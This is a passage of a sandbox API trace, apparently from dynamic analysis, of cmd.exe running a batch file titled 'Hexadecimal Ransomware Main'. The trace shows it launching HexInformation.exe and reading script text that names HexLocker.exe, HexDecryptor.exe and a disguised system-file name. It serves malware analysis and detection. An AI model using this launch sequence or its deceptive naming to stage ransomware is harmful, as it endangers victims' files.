SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b8 [0113.384] GetProcessHeap () returned 0x1dc256b0000 [0113.384] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x4012) returned 0x1dc256d9590 [0113.384] GetProcessHeap () returned 0x1dc256b0000 [0113.384] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256d9590) returned 1 [0113.386] _wcsicmp (_String1="start", _String2=")") returned 74 [0113.386] _wcsicmp (_String1="FOR", _String2="start") returned -13 [0113.386] _wcsicmp (_String1="FOR/?", _String2="start") returned -13 [0113.386] _wcsicmp (_String1="IF", _String2="start") returned -10 [0113.386] _wcsicmp (_String1="IF/?", _String2="start") returned -10 [0113.386] _wcsicmp (_String1="REM", _String2="start") returned -1 [0113.386] _wcsicmp (_String1="REM/?", _String2="start") returned -1 [0113.386] GetProcessHeap () returned 0x1dc256b0000 [0113.386] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xb0) returned 0x1dc256bba70 [0113.386] GetProcessHeap () returned 0x1dc256b0000 [0113.386] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1c) returned 0x1dc256c3380 [0113.386] GetProcessHeap () returned 0x1dc256b0000 [0113.386] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x38) returned 0x1dc256c2c90 [0113.387] _tell (_FileHandle=3) returned 440 [0113.387] _close (_FileHandle=3) returned 0 [0113.387] malloc (_Size=0xffce) returned 0x1dc257e0160 [0113.388] ??_V@YAXPEAX@Z () returned 0x1dc257e0160 [0113.389] _wcsicmp (_String1="start", _String2="DIR") returned 15 [0113.389] _wcsicmp (_String1="start", _String2="ERASE") returned 14 [0113.389] _wcsicmp (_String1="start", _String2="DEL") returned 15 [0113.389] _wcsicmp (_String1="start", _String2="TYPE") returned -1 [0113.389] _wcsicmp (_String1="start", _String2="COPY") returned 16 [0113.389] _wcsicmp (_String1="start", _String2="CD") returned 16 [0113.389] _wcsicmp (_String1="start", _String2="CHDIR") returned 16 [0113.389] _wcsicmp (_String1="start", _String2="RENAME") returned 1 [0113.389] _wcsicmp (_String1="start", _String2="REN") returned 1 [0113.389] _wcsicmp (_String1="start", _String2="ECHO") returned 14 [0113.389] _wcsicmp (_String1="start", _String2="SET") returned 15 [0113.389] _wcsicmp (_String1="start", _String2="PAUSE") returned 3 [0113.390] _wcsicmp (_String1="start", _String2="DATE") returned 15 [0113.390] _wcsicmp (_String1="start", _String2="TIME") returned -1 [0113.390] _wcsicmp (_String1="start", _String2="PROMPT") returned 3 [0113.390] _wcsicmp (_String1="start", _String2="MD") returned 6 [0113.390] _wcsicmp (_String1="start", _String2="MKDIR") returned 6 [0113.390] _wcsicmp (_String1="start", _String2="RD") returned 1 [0113.390] _wcsicmp (_String1="start", _String2="RMDIR") returned 1 [0113.390] _wcsicmp (_String1="start", _String2="PATH") returned 3 [0113.390] _wcsicmp (_String1="start", _String2="GOTO") returned 12 [0113.390] _wcsicmp (_String1="start", _String2="SHIFT") returned 12 [0113.391] _wcsicmp (_String1="start", _String2="CLS") returned 16 [0113.391] _wcsicmp (_String1="start", _String2="CALL") returned 16 [0113.391] _wcsicmp (_String1="start", _String2="VERIFY") returned -3 [0113.391] _wcsicmp (_String1="start", _String2="VER") returned -3 [0113.391] _wcsicmp (_String1="start", _String2="VOL") returned -3 [0113.391] _wcsicmp (_String1="start", _String2="EXIT") returned 14 [0113.391] _wcsicmp (_String1="start", _String2="SETLOCAL") returned 15 [0113.391] _wcsicmp (_String1="start", _String2="ENDLOCAL") returned 14 [0113.391] _wcsicmp (_String1="start", _String2="TITLE") returned -1 [0113.391] _wcsicmp (_String1="start", _String2="START") returned 0 [0113.391] GetConsoleTitleW (in: lpConsoleTitle=0x407419eca0, nSize=0x104 | out: lpConsoleTitle="Administrator: Hexadecimal Ransomware Main") returned 0x2c [0113.464] malloc (_Size=0xffce) returned 0x1dc257f0140 [0113.464] ??_V@YAXPEAX@Z () returned 0x1dc257f0140 [0113.465] malloc (_Size=0xffce) returned 0x1dc25800120 [0113.465] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0113.466] _wcsicmp (_String1="start", _String2="DIR") returned 15 [0113.466] _wcsicmp (_String1="start", _String2="ERASE") returned 14 [0113.466] _wcsicmp (_String1="start", _String2="DEL") returned 15 [0113.466] _wcsicmp (_String1="start", _String2="TYPE") returned -1 [0113.466] _wcsicmp (_String1="start", _String2="COPY") returned 16 [0113.466] _wcsicmp (_String1="start", _String2="CD") returned 16 [0113.466] _wcsicmp (_String1="start", _String2="CHDIR") returned 16 [0113.466] _wcsicmp (_String1="start", _String2="RENAME") returned 1 [0113.466] _wcsicmp (_String1="start", _String2="REN") returned 1 [0113.466] _wcsicmp (_String1="start", _String2="ECHO") returned 14 [0113.466] _wcsicmp (_String1="start", _String2="SET") returned 15 [0113.466] _wcsicmp (_String1="start", _String2="PAUSE") returned 3 [0113.466] _wcsicmp (_String1="start", _String2="DATE") returned 15 [0113.466] _wcsicmp (_String1="start", _String2="TIME") returned -1 [0113.466] _wcsicmp (_String1="start", _String2="PROMPT") returned 3 [0113.466] _wcsicmp (_String1="start", _String2="MD") returned 6 [0113.466] _wcsicmp (_String1="start", _String2="MKDIR") returned 6 [0113.467] _wcsicmp (_String1="start", _String2="RD") returned 1 [0113.467] _wcsicmp (_String1="start", _String2="RMDIR") returned 1 [0113.467] _wcsicmp (_String1="start", _String2="PATH") returned 3 [0113.467] _wcsicmp (_String1="start", _String2="GOTO") returned 12 [0113.467] _wcsicmp (_String1="start", _String2="SHIFT") returned 12 [0113.467] _wcsicmp (_String1="start", _String2="CLS") returned 16 [0113.467] _wcsicmp (_String1="start", _String2="CALL") returned 16 [0113.467] _wcsicmp (_String1="start", _String2="VERIFY") returned -3 [0113.467] _wcsicmp (_String1="start", _String2="VER") returned -3 [0113.467] _wcsicmp (_String1="start", _String2="VOL") returned -3 [0113.467] _wcsicmp (_String1="start", _String2="EXIT") returned 14 [0113.467] _wcsicmp (_String1="start", _String2="SETLOCAL") returned 15 [0113.467] _wcsicmp (_String1="start", _String2="ENDLOCAL") returned 14 [0113.467] _wcsicmp (_String1="start", _String2="TITLE") returned -1 [0113.467] _wcsicmp (_String1="start", _String2="START") returned 0 [0113.467] ??_V@YAXPEAX@Z () returned 0x1 [0113.469] GetProcessHeap () returned 0x1dc256b0000 [0113.469] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x60) returned 0x1dc256b6d80 [0113.469] GetProcessHeap () returned 0x1dc256b0000 [0113.469] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256b6d80, Size=0x38) returned 0x1dc256b6d80 [0113.469] GetProcessHeap () returned 0x1dc256b0000 [0113.469] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256b6d80) returned 0x38 [0113.469] GetProcessHeap () returned 0x1dc256b0000 [0113.469] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x44) returned 0x1dc256bf450 [0113.469] GetStdHandle (nStdHandle=0xfffffff6) returned 0x4c [0113.469] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0113.469] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0113.469] malloc (_Size=0xffce) returned 0x1dc25800120 [0113.471] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0113.472] malloc (_Size=0x4000) returned 0x1dc255c5910 [0113.472] malloc (_Size=0x4000) returned 0x1dc25810100 [0113.472] malloc (_Size=0x4000) returned 0x1dc25814110 [0113.472] malloc (_Size=0x4000) returned 0x1dc25818120 [0113.472] malloc (_Size=0x4000) returned 0x1dc2581c130 [0113.472] malloc (_Size=0x4000) returned 0x1dc25820140 [0113.473] malloc (_Size=0x4000) returned 0x1dc25824150 [0113.473] _wcsicmp (_String1="HexInformation.exe", _String2="DIR") returned 4 [0113.473] _wcsicmp (_String1="HexInformation.exe", _String2="ERASE") returned 3 [0113.473] _wcsicmp (_String1="HexInformation.exe", _String2="DEL") returned 4 [0113.473] _wcsicmp (_String1="HexInformation.exe", _String2="TYPE") returned -12 [0113.473] _wcsicmp (_String1="HexInformation.exe", _String2="COPY") returned 5 [0113.473] _wcsicmp (_String1="HexInformation.exe", _String2="CD") returned 5 [0113.473] _wcsicmp (_String1="HexInformation.exe", _String2="CHDIR") returned 5 [0113.473] _wcsicmp (_String1="HexInformation.exe", _String2="RENAME") returned -10 [0113.473] _wcsicmp (_String1="HexInformation.exe", _String2="REN") returned -10 [0113.473] _wcsicmp (_String1="HexInformation.exe", _String2="ECHO") returned 3 [0113.473] _wcsicmp (_String1="HexInformation.exe", _String2="SET") returned -11 [0113.473] _wcsicmp (_String1="HexInformation.exe", _String2="PAUSE") returned -8 [0113.473] _wcsicmp (_String1="HexInformation.exe", _String2="DATE") returned 4 [0113.473] _wcsicmp (_String1="HexInformation.exe", _String2="TIME") returned -12 [0113.473] _wcsicmp (_String1="HexInformation.exe", _String2="PROMPT") returned -8 [0113.473] _wcsicmp (_String1="HexInformation.exe", _String2="MD") returned -5 [0113.473] _wcsicmp (_String1="HexInformation.exe", _String2="MKDIR") returned -5 [0113.473] _wcsicmp (_String1="HexInformation.exe", _String2="RD") returned -10 [0113.473] _wcsicmp (_String1="HexInformation.exe", _String2="RMDIR") returned -10 [0113.473] _wcsicmp (_String1="HexInformation.exe", _String2="PATH") returned -8 [0113.474] _wcsicmp (_String1="HexInformation.exe", _String2="GOTO") returned 1 [0113.474] _wcsicmp (_String1="HexInformation.exe", _String2="SHIFT") returned -11 [0113.474] _wcsicmp (_String1="HexInformation.exe", _String2="CLS") returned 5 [0113.474] _wcsicmp (_String1="HexInformation.exe", _String2="CALL") returned 5 [0113.474] _wcsicmp (_String1="HexInformation.exe", _String2="VERIFY") returned -14 [0113.474] _wcsicmp (_String1="HexInformation.exe", _String2="VER") returned -14 [0113.474] _wcsicmp (_String1="HexInformation.exe", _String2="VOL") returned -14 [0113.474] _wcsicmp (_String1="HexInformation.exe", _String2="EXIT") returned 3 [0113.474] _wcsicmp (_String1="HexInformation.exe", _String2="SETLOCAL") returned -11 [0113.474] _wcsicmp (_String1="HexInformation.exe", _String2="ENDLOCAL") returned 3 [0113.474] _wcsicmp (_String1="HexInformation.exe", _String2="TITLE") returned -12 [0113.474] _wcsicmp (_String1="HexInformation.exe", _String2="START") returned -11 [0113.474] _wcsicmp (_String1="HexInformation.exe", _String2="DPATH") returned 4 [0113.474] _wcsicmp (_String1="HexInformation.exe", _String2="KEYS") returned -3 [0113.474] _wcsicmp (_String1="HexInformation.exe", _String2="MOVE") returned -5 [0113.474] _wcsicmp (_String1="HexInformation.exe", _String2="PUSHD") returned -8 [0113.474] _wcsicmp (_String1="HexInformation.exe", _String2="POPD") returned -8 [0113.474] _wcsicmp (_String1="HexInformation.exe", _String2="ASSOC") returned 7 [0113.474] _wcsicmp (_String1="HexInformation.exe", _String2="FTYPE") returned 2 [0113.474] _wcsicmp (_String1="HexInformation.exe", _String2="BREAK") returned 6 [0113.474] _wcsicmp (_String1="HexInformation.exe", _String2="COLOR") returned 5 [0113.474] _wcsicmp (_String1="HexInformation.exe", _String2="MKLINK") returned -5 [0113.474] _wcsicmp (_String1="HexInformation.exe", _String2="FOR") returned 2 [0113.474] _wcsicmp (_String1="HexInformation.exe", _String2="IF") returned -1 [0113.475] _wcsicmp (_String1="HexInformation.exe", _String2="REM") returned -10 [0113.475] _wcsnicmp (_String1="HexI", _String2="cmd ", _MaxCount=0x4) returned 5 [0113.475] malloc (_Size=0xffce) returned 0x1dc25828160 [0113.475] ??_V@YAXPEAX@Z () returned 0x1dc25828160 [0113.476] GetProcessHeap () returned 0x1dc256b0000 [0113.476] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1ffac) returned 0x1dc256d9590 [0113.480] SetErrorMode (uMode=0x0) returned 0x0 [0113.480] SetErrorMode (uMode=0x1) returned 0x0 [0113.480] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x1dc256d95a0, lpFilePart=0x407419e130 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x407419e130*="Desktop") returned 0x17 [0113.480] SetErrorMode (uMode=0x0) returned 0x1 [0113.480] GetProcessHeap () returned 0x1dc256b0000 [0113.480] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256d9590, Size=0x66) returned 0x1dc256d9590 [0113.480] GetProcessHeap () returned 0x1dc256b0000 [0113.480] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256d9590) returned 0x66 [0113.480] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0113.480] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0113.480] GetProcessHeap () returned 0x1dc256b0000 [0113.480] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1bc) returned 0x1dc256bd640 [0113.480] GetProcessHeap () returned 0x1dc256b0000 [0113.480] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x368) returned 0x1dc256be260 [0113.481] GetProcessHeap () returned 0x1dc256b0000 [0113.481] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256be260, Size=0x1be) returned 0x1dc256be260 [0113.481] GetProcessHeap () returned 0x1dc256b0000 [0113.481] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256be260) returned 0x1be [0113.481] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0113.481] GetProcessHeap () returned 0x1dc256b0000 [0113.481] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xe8) returned 0x1dc256c6090 [0113.481] GetProcessHeap () returned 0x1dc256b0000 [0113.481] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256c6090, Size=0x7e) returned 0x1dc256c1630 [0113.481] GetProcessHeap () returned 0x1dc256b0000 [0113.481] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256c1630) returned 0x7e [0113.481] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0113.481] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexInformation.exe", fInfoLevelId=0x1, lpFindFileData=0x407419dea0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419dea0) returned 0x1dc256bee40 [0113.481] FindClose (in: hFindFile=0x1dc256bee40 | out: hFindFile=0x1dc256bee40) returned 1 [0113.482] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0113.482] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0113.482] ??_V@YAXPEAX@Z () returned 0x1 [0113.483] GetStartupInfoW (in: lpStartupInfo=0x407419e520 | out: lpStartupInfo=0x407419e520*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0113.483] InitializeProcThreadAttributeList (in: lpAttributeList=0x0, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x407419e488 | out: lpAttributeList=0x0, lpSize=0x407419e488) returned 0 [0113.483] GetLastError () returned 0x7a [0113.483] GetProcessHeap () returned 0x1dc256b0000 [0113.483] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x48) returned 0x1dc256bf310 [0113.483] InitializeProcThreadAttributeList (in: lpAttributeList=0x1dc256bf310, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x407419e488 | out: lpAttributeList=0x1dc256bf310, lpSize=0x407419e488) returned 1 [0113.483] UpdateProcThreadAttribute (in: lpAttributeList=0x1dc256bf310, dwFlags=0x0, Attribute=0x60001, lpValue=0x407419e484, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1dc256bf310, lpPreviousValue=0x0) returned 1 [0113.483] CreateProcessW (in: lpApplicationName="C:\\Users\\FD1HVy\\Desktop\\HexInformation.exe", lpCommandLine="HexInformation.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80410, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x407419e4b0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4c, hStdOutput=0x50, hStdError=0x54), lpProcessInformation=0x407419e490 | out: lpCommandLine="HexInformation.exe ", lpProcessInformation=0x407419e490*(hProcess=0x9c, hThread=0xa0, dwProcessId=0x97c, dwThreadId=0x778)) returned 1 [0114.444] DeleteProcThreadAttributeList (in: lpAttributeList=0x1dc256bf310 | out: lpAttributeList=0x1dc256bf310) [0114.444] GetProcessHeap () returned 0x1dc256b0000 [0114.444] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf310) returned 1 [0114.444] GetLastError () returned 0x0 [0114.444] ResumeThread (hThread=0xa0) returned 0x0 [0114.444] CloseHandle (hObject=0xa0) returned 1 [0114.444] CloseHandle (hObject=0x9c) returned 1 [0114.444] ??_V@YAXPEAX@Z () returned 0x1 [0114.446] ??_V@YAXPEAX@Z () returned 0x1 [0114.446] ??_V@YAXPEAX@Z () returned 0x1 [0114.464] ??_V@YAXPEAX@Z () returned 0x1 [0114.467] ??_V@YAXPEAX@Z () returned 0x1 [0114.471] ??_V@YAXPEAX@Z () returned 0x1 [0114.475] ??_V@YAXPEAX@Z () returned 0x1 [0114.477] ??_V@YAXPEAX@Z () returned 0x1 [0114.480] ??_V@YAXPEAX@Z () returned 0x1 [0114.483] _get_osfhandle (_FileHandle=1) returned 0x50 [0114.483] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0114.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0114.681] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff67b90fc08 | out: lpMode=0x7ff67b90fc08) returned 1 [0114.973] _get_osfhandle (_FileHandle=0) returned 0x4c [0114.973] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff67b90fc0c | out: lpMode=0x7ff67b90fc0c) returned 1 [0115.220] SetConsoleInputExeNameW () returned 0x1 [0115.220] GetConsoleOutputCP () returned 0x1b5 [0115.445] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff67b90fbb0 | out: lpCPInfo=0x7ff67b90fbb0) returned 1 [0115.445] SetThreadUILanguage (LangId=0x0) returned 0x409 [0115.552] ??_V@YAXPEAX@Z () returned 0x1 [0115.555] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp\\9bba.tmp\\9bcb.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x407419eef8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0115.556] _open_osfhandle (_OSFileHandle=0x9c, _Flags=8) returned 3 [0115.556] _get_osfhandle (_FileHandle=3) returned 0x9c [0115.556] SetFilePointer (in: hFile=0x9c, lDistanceToMove=440, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b8 [0115.556] GetProcessHeap () returned 0x1dc256b0000 [0115.556] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c1630) returned 1 [0115.556] GetProcessHeap () returned 0x1dc256b0000 [0115.556] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256be260) returned 1 [0115.556] GetProcessHeap () returned 0x1dc256b0000 [0115.556] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bd640) returned 1 [0115.556] GetProcessHeap () returned 0x1dc256b0000 [0115.556] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256d9590) returned 1 [0115.556] GetProcessHeap () returned 0x1dc256b0000 [0115.556] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf450) returned 1 [0115.556] GetProcessHeap () returned 0x1dc256b0000 [0115.556] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256b6d80) returned 1 [0115.556] GetProcessHeap () returned 0x1dc256b0000 [0115.556] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c2c90) returned 1 [0115.556] GetProcessHeap () returned 0x1dc256b0000 [0115.556] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c3380) returned 1 [0115.556] GetProcessHeap () returned 0x1dc256b0000 [0115.556] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bba70) returned 1 [0115.556] _get_osfhandle (_FileHandle=3) returned 0x9c [0115.556] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b8 [0115.556] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff67b909970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x407419eeb0, lpOverlapped=0x0 | out: lpBuffer=0x7ff67b909970*, lpNumberOfBytesRead=0x407419eeb0*=0x31, lpOverlapped=0x0) returned 1 [0115.557] SetFilePointer (in: hFile=0x9c, lDistanceToMove=464, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d0 [0115.557] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff67b909970, cbMultiByte=24, lpWideCharStr=0x7ff67b913c30, cchWideChar=8191 | out: lpWideCharStr="start HexDecryptor.exe\r\n\r\nktop\r\ne%\\desktop\\HexLocker.exe\r\nexe\r\nWindows\\MicrosoftNTSystem.sys\r\n") returned 24 [0115.557] _get_osfhandle (_FileHandle=3) returned 0x9c [0115.557] GetFileType (hFile=0x9c) returned 0x1 [0115.557] _get_osfhandle (_FileHandle=3) returned 0x9c [0115.557] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d0 [0115.558] GetProcessHeap () returned 0x1dc256b0000 [0115.558] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x4012) returned 0x1dc256db7b0 [0115.558] GetProcessHeap () returned 0x1dc256b0000 [0115.558] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256db7b0) returned 1 [0115.558] _wcsicmp (_String1="start", _String2=")") returned 74 [0115.558] _wcsicmp (_String1="FOR", _String2="start") returned -13 [0115.558] _wcsicmp (_String1="FOR/?", _String2="start") returned -13 [0115.558] _wcsicmp (_String1="IF", _String2="start") returned -10 [0115.558] _wcsicmp (_String1="IF/?", _String2="start") returned -10 [0115.558] _wcsicmp (_String1="REM", _String2="start") returned -1 [0115.558] _wcsicmp (_String1="REM/?", _String2="start") returned -1 [0115.558] GetProcessHeap () returned 0x1dc256b0000 [0115.558] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xb0) returned 0x1dc256bba70 [0115.558] GetProcessHeap () returned 0x1dc256b0000 [0115.558] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1c) returned 0x1dc256c3380 [0115.558] GetProcessHeap () returned 0x1dc256b0000 [0115.558] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x34) returned 0x1dc256c2fd0 [0115.558] _tell (_FileHandle=3) returned 464 [0115.558] _close (_FileHandle=3) returned 0 [0115.559] malloc (_Size=0xffce) returned 0x1dc257e0160 [0115.560] ??_V@YAXPEAX@Z () returned 0x1dc257e0160 [0115.561] _wcsicmp (_String1="start", _String2="DIR") returned 15 [0115.561] _wcsicmp (_String1="start", _String2="ERASE") returned 14 [0115.561] _wcsicmp (_String1="start", _String2="DEL") returned 15 [0115.561] _wcsicmp (_String1="start", _String2="TYPE") returned -1 [0115.561] _wcsicmp (_String1="start", _String2="COPY") returned 16 [0115.561] _wcsicmp (_String1="start", _String2="CD") returned 16 [0115.561] _wcsicmp (_String1="start", _String2="CHDIR") returned 16 [0115.561] _wcsicmp (_String1="start", _String2="RENAME") returned 1 [0115.561] _wcsicmp (_String1="start", _String2="REN") returned 1 [0115.561] _wcsicmp (_String1="start", _String2="ECHO") returned 14 [0115.561] _wcsicmp (_String1="start", _String2="SET") returned 15 [0115.561] _wcsicmp (_String1="start", _String2="PAUSE") returned 3 [0115.561] _wcsicmp (_String1="start", _String2="DATE") returned 15 [0115.561] _wcsicmp (_String1="start", _String2="TIME") returned -1 [0115.561] _wcsicmp (_String1="start", _String2="PROMPT") returned 3 [0115.561] _wcsicmp (_String1="start", _String2="MD") returned 6 [0115.561] _wcsicmp (_String1="start", _String2="MKDIR") returned 6 [0115.561] _wcsicmp (_String1="start", _String2="RD") returned 1 [0115.562] _wcsicmp (_String1="start", _String2="RMDIR") returned 1 [0115.562] _wcsicmp (_String1="start", _String2="PATH") returned 3 [0115.562] _wcsicmp (_String1="start", _String2="GOTO") returned 12 [0115.562] _wcsicmp (_String1="start", _String2="SHIFT") returned 12 [0115.562] _wcsicmp (_String1="start", _String2="CLS") returned 16 [0115.562] _wcsicmp (_String1="start", _String2="CALL") returned 16 [0115.562] _wcsicmp (_String1="start", _String2="VERIFY") returned -3 [0115.562] _wcsicmp (_String1="start", _String2="VER") returned -3 [0115.562] _wcsicmp (_String1="start", _String2="VOL") returned -3 [0115.562] _wcsicmp (_String1="start", _String2="EXIT") returned 14 [0115.562] _wcsicmp (_String1="start", _String2="SETLOCAL") returned 15 [0115.562] _wcsicmp (_String1="start", _String2="ENDLOCAL") returned 14 [0115.562] _wcsicmp (_String1="start", _String2="TITLE") returned -1 [0115.562] _wcsicmp (_String1="start", _String2="START") returned 0 [0115.562] GetConsoleTitleW (in: lpConsoleTitle=0x407419eca0, nSize=0x104 | out: lpConsoleTitle="Administrator: Hexadecimal Ransomware Main") returned 0x2c [0115.730] malloc (_Size=0xffce) returned 0x1dc257f0140 [0115.730] ??_V@YAXPEAX@Z () returned 0x1dc257f0140 [0115.731] malloc (_Size=0xffce) returned 0x1dc25800120 [0115.731] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0115.731] _wcsicmp (_String1="start", _String2="DIR") returned 15 [0115.731] _wcsicmp (_String1="start", _String2="ERASE") returned 14 [0115.731] _wcsicmp (_String1="start", _String2="DEL") returned 15 [0115.731] _wcsicmp (_String1="start", _String2="TYPE") returned -1 [0115.731] _wcsicmp (_String1="start", _String2="COPY") returned 16 [0115.731] _wcsicmp (_String1="start", _String2="CD") returned 16 [0115.731] _wcsicmp (_String1="start", _String2="CHDIR") returned 16 [0115.731] _wcsicmp (_String1="start", _String2="RENAME") returned 1 [0115.731] _wcsicmp (_String1="start", _String2="REN") returned 1 [0115.731] _wcsicmp (_String1="start", _String2="ECHO") returned 14 [0115.731] _wcsicmp (_String1="start", _String2="SET") returned 15 [0115.732] _wcsicmp (_String1="start", _String2="PAUSE") returned 3 [0115.732] _wcsicmp (_String1="start", _String2="DATE") returned 15 [0115.732] _wcsicmp (_String1="start", _String2="TIME") returned -1 [0115.732] _wcsicmp (_String1="start", _String2="PROMPT") returned 3 [0115.732] _wcsicmp (_String1="start", _String2="MD") returned 6 [0115.732] _wcsicmp (_String1="start", _String2="MKDIR") returned 6 [0115.732] _wcsicmp (_String1="start", _String2="RD") returned 1 [0115.732] _wcsicmp (_String1="start", _String2="RMDIR") returned 1 [0115.732] _wcsicmp (_String1="start", _String2="PATH") returned 3 [0115.732] _wcsicmp (_String1="start", _String2="GOTO") returned 12 [0115.732] _wcsicmp (_String1="start", _String2="SHIFT") returned 12 [0115.732] _wcsicmp (_String1="start", _String2="CLS") returned 16 [0115.732] _wcsicmp (_String1="start", _String2="CALL") returned 16 [0115.732] _wcsicmp 